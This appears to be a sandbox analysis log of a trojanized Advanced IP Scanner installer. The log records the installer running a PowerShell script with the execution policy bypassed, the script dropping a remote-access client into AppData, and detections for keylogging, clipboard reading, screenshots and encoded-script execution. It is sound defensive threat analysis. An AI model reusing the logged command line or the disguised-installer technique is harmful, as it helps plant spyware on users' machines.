Source: powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: is-R93D4.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Advanced_IP_Scanner_2.5.4594.12.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	String found in binary or memory: https://www.innosetup.com/
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

7_2_1101F360

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	7_2_1101F360
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11032930 GetClipboardFormatNameA,SetClipboardData,	7_2_11032930
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	8_2_1101F360
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,	8_2_11032930

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,

7_2_11031AC0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

7_2_11007720

Yara detected Keylogger Generic

Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 1832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		7_2_11112840
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		8_2_11112840

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7132.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll	Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Process Stats: CPU usage > 49%

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110A9240: DeviceIoControl,

7_2_110A9240

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

7_2_1115A340

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		8_2_1102CE2D

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07675D0A	5_2_07675D0A
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11029230	7_2_11029230
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11072460	7_2_11072460
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115B180	7_2_1115B180
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1107F520	7_2_1107F520
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101B980	7_2_1101B980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115F9F0	7_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101BDC0	7_2_1101BDC0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11163C55	7_2_11163C55
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11050430	7_2_11050430
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110088DB	7_2_110088DB
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101CBE0	7_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11032A60	7_2_11032A60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11086DA0	7_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11044C60	7_2_11044C60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6859A980	7_2_6859A980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4910	7_2_685C4910
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C3923	7_2_685C3923
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6859DBA0	7_2_6859DBA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C3DB8	7_2_685C3DB8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685CA063	7_2_685CA063
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115B180	8_2_1115B180
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11029230	8_2_11029230
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1107F520	8_2_1107F520
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101B980	8_2_1101B980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115F9F0	8_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101BDC0	8_2_1101BDC0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11163C55	8_2_11163C55
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11050430	8_2_11050430
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11072460	8_2_11072460
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110088DB	8_2_110088DB
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101CBE0	8_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11032A60	8_2_11032A60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11086DA0	8_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11044C60	8_2_11044C60

Enables security privileges

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685A7D00 appears 71 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685A7A90 appears 36 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685930A0 appears 33 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11142A60 appears 1055 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 68596F50 appears 115 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11080C50 appears 64 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1116B7E0 appears 54 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1115CBB3 appears 92 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 110290F0 appears 1919 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1105D340 appears 492 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1109CBD0 appears 32 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 111434D0 appears 42 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1105D470 appears 41 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11027550 appears 94 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11160790 appears 64 times

PE file contains executable resources (Code or Archives)

Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-J88P9.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

PE file contains more sections than normal

Source: is-J88P9.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: Advanced_IP_Scanner_2.5.4594.12.exe	Static PE information: Number of sections : 11 > 10
Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: Number of sections : 11 > 10

PE file does not import any functions

Source: is-9QSUE.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-GUGRV.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-GSEGB.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-JD615.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-BI69I.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-JV2VP.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-51B0J.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-GO656.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-HE8PV.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-UNM54.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-T33P0.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-UUUMK.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-E5GMR.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-VU48S.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-MLS3P.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-B6942.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-3DFK3.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-IMIK4.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-37BEP.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-7T7KO.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-CFBB0.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-HU2BS.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-4PSUK.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-94LO6.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-2CC7N.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-087J4.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-G1AVJ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-NAJMA.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-8NFDN.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-8I66A.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-3ARML.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-NDG98.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-KVJOO.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-QNSIE.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-7UOKJ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-JMQQ6.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-NMSBJ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-50T4N.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-OFA57.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-QK8GI.tmp.1.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EDFB000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000000.1787412692.0000000000B09000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000034DF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe

Uses 32bit PE files

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: amsi32_7132.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal56.rans.spre.troj.evad.winEXE@10/300@3/3

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11059270 GetLastError,FormatMessageA,LocalFree,

7_2_11059270

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	7_2_1109C750
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	7_2_1109C7E0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	8_2_1109C750
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	8_2_1109C7E0

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

7_2_11095C90

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11088290 FindResourceA,LoadResource,LockResource,

7_2_11088290

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

File created: C:\Program Files (x86)\Advanced IP Scanner

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\SysHelper

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

File created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: Advanced_IP_Scanner_2.5.4594.12.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

File read: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: uxtheme.dll	Jump to behavior
